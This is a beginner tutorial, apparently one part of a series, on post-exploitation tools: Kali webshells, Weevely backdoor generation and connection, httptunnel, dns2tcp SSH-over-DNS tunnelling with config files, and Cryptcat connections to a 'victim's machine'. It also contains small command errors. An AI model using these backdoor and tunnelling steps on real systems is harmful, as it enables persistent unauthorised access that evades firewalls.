Hacking Articles is an article/guides about basic hacking and any topics related to Hacking/Technology.
This was written by Rovic Balingbing a.k.a. Baby Esue, it consists of 30 parts, this "Hacking Articles" consists of some articles, guides, tutor...
To open Webshells, go to the terminal and type "cd /usr/share/webshells"
And you can see that they are divided in classes according to the programming language: asp, aspx, cfm, jsp, perl, and php. So, if you enter in the PHP folder, you will see all the webshells for PHP pages.
And to upload the shell to a web server, write "/simple-backdoor.php" at the webpage or URL of the Webshell and write the cmd command like in the picture below.
Oops! This image does not follow our content guidelines. To continue publishing, please remove it or upload a different image.
Weevely
-What is weevely? It is a PHP web shell that stimulate telnet-like connection. It is also a tool for web application post exploitation and can be used as a stealth backdoor or as a web shell to manage legit web accounts, even free hosted ones.
To use Weevely, go to the terminal and type "weevely" and to generate the shell, just type "weevely generate password pathoffile". After uploading the web shells, we can now connect with cmd to the server using the comman "weevely URL password".
http-tunnel
-Here we are again, in the http portion. Well, this one creates a bidirectional virtual data stream tunneled in HTTP requests. The requests can be sent through a HTTP proxy if desired. This was also can be useful for users behind restrictive firewalls, so if WWW access is allowed through a HTTP proxy, it is possible to use http-tunnel and telnet or PPP to connect to a computer outside a firewall.
We just need to create a tunnel server by typing the following command:
httptunnel_server -h
Then, on the client site you need to type "httptunne_client -h" and both will start to accept connections.
dns2tcp
-This one sounds familiar, right? We have already tackled dns and tcp topic at the previous articles. Dns2tcp is a tunneling tool that can help to pass the TCP traffic through DNS traffic, which means UDP 53 port.
To start using this one, just type "dns2tcpd" and the usage will be explained when you will open the script.
On the Server site, enter this command to configure the file
#cat >>.dns2tcpdrc <<END
listen = 53
port = 53
user=nobody
chroot= /root/dns2tcp
pid_file = /var/run/dns2tcp.pid
domain = your domain key = secretkey
resources = ssh:127.0.0.1:22
END
#dns2tcpd -f .dns2tcpdrc
While on the client site, type the command:
# cat >>.dns2tcprc <<END
domain = your domain
resource = ssh
local_port = 7891
key = secretkey
END
# dns2tcpc -f .dns2tcprc
# ssh root@localhost -p 7891 -D 7076
And tunneling will start with the commands above.
Cryptcat
-This is the last tool that we can use to maintain access to other computer or machines, it was just like a Netcat too that allows to make TCP and UDP connection with a victim's machine in an encrypted way.
To start a server to listen for a connection, just type:
Cryptcat -l -p port -n
Where,
· -l stands for listening to a connection.
· -p stands for port number parameter.
· -n stands for not doing the name resolution
On the client site, the connection command you need to use is "cryptcat IPofServer PortofServer" (Example: "cryptcat 127.0.0.1 78")
Wow, that's it guys, I will be honest to all of you that even me got a weird feeling when typing this article in my laptop, I felt some dizziness and it got me crazy hehe but I hope you learn something today and please keep on following this group and subscribe for more articles that we will brought to you.
